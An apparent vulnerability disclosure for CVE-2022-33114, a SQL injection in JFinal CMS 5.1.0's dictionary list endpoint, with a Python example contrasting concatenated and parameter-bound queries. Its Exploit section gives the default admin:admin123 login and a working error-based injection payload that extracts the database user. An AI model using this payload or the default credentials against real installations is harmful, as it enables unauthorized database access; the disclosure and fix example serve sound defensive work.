Headline
CVE-2022-33114: SQL injection vulnerability exists in JFinal CMS 5.1.0 · Issue #38 · jflyfox/jfinal_cms
JFinal CMS v5.1.0 was discovered to contain a SQL injection vulnerability via the attrVal parameter at /jfinal_cms/system/dict/list.
Vulnerability Analysis
The vulnerability appears in lines 23-28 of com.jflyfox.system.dict.DictController.java.
The attrVal parameter is the attr.dict_type parameter passed from the front end.
So a payload can be constructed to exploit this vulnerability.
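The pattern behind this class of bug, shown next to the parameter-bound fix, as an added example that is not JFinal CMS code. It assumes attrVal is concatenated into the query text; Python's sqlite3 stands in for the CMS database, and the table name, function names and sample rows are hypothetical.

```python
import sqlite3

def make_db():
    """In-memory table standing in for the CMS dictionary data (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE dict_detail_demo (id INTEGER PRIMARY KEY, dict_type TEXT, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO dict_detail_demo (dict_type, name) VALUES (?, ?)",
        [("articleType", "news"), ("articleType", "blog"), ("linkType", "partner")],
    )
    return conn

def list_concat(conn, attr_val):
    """Weak pattern: the request value becomes part of the SQL text itself."""
    sql = "SELECT name FROM dict_detail_demo WHERE 1=1"
    if attr_val:
        sql += " AND dict_type = '" + attr_val + "'"
    return [row[0] for row in conn.execute(sql + " ORDER BY id")]

def list_bound(conn, attr_val):
    """Hardened pattern: the SQL text is fixed and the value is a bound parameter."""
    sql = "SELECT name FROM dict_detail_demo WHERE 1=1"
    params = []
    if attr_val:
        sql += " AND dict_type = ?"
        params.append(attr_val)
    return [row[0] for row in conn.execute(sql + " ORDER BY id", params)]

if __name__ == "__main__":
    conn = make_db()
    benign = "articleType"
    crafted = "x' OR '1'='1"  # constructed input that closes the string literal
    for label, value in (("benign", benign), ("crafted", crafted)):
        # With the crafted value the concatenated query ignores the filter,
        # while the bound query treats the whole value as one literal.
        print(label, "concat:", list_concat(conn, value))
        print(label, "bound: ", list_bound(conn, value))
```

With the bound form, the value of attr.dict_type can only ever be compared against the column, whatever characters it contains.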
Exploit
Maven Startup Environment
Vulnerability address: /jfinal_cms/system/dict/list
Administrator login is required. The default account password is admin:admin123
Injection parameters: attr.dict_type
payload:’ OR (SELECT 2896 FROM(SELECT COUNT(),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–+
Sqlmap: